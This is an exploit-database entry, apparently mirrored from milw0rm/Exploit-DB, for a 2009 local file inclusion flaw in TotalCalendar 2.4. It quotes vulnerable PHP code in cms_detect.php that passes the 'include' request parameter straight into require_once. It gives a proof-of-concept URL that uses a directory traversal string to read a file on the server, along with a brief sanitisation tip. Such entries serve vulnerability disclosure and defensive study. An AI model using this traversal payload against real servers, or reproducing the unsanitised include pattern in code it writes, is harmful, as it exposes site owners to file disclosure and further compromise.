header-logo
Suggest Exploit
vendor:
TotalCalendar
by:
SirGod
7,5
CVSS
HIGH
Local File Inclusion
98
CWE
Product Name: TotalCalendar
Affected Version From: 2.4
Affected Version To: 2.4
Patch Exists: YES
Related CWE: N/A
CPE: 2.4
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

TotalCalendar 2.4 (include) Local File Inclusion

Vulnerable code in cms_detect.php: Line 26: $include = isset($_REQUEST['include']) ? $_REQUEST['include'] : null; Line 115: if(!empty($include)) require_once($inc_dir.$include); PoC: http://127.0.0.1/[path]/cms_detect.php?include=../../../../../../BOOTSECT.BAK

Mitigation:

Ensure that user input is properly sanitized and validated before being used in a file path.
Source

Exploit-DB raw data:

##########################################################################################
[+] TotalCalendar 2.4 (include) Local File Inclusion
[+] Discovered By SirGod
[+] www.mortal-team.org
[+] www.h4cky0u.org
##########################################################################################

[+] Local File Inclusion

Vulnerable code in cms_detect.php:

-------------------------------------------------------------------------------
Line 26 : $include = isset($_REQUEST['include']) ? $_REQUEST['include'] : null;
Line 115 : if(!empty($include)) require_once($inc_dir.$include);
-------------------------------------------------------------------------------

  PoC :

   http://127.0.0.1/[path]/cms_detect.php?include=../../../../../../BOOTSECT.BAK

##########################################################################################

# milw0rm.com [2009-04-21]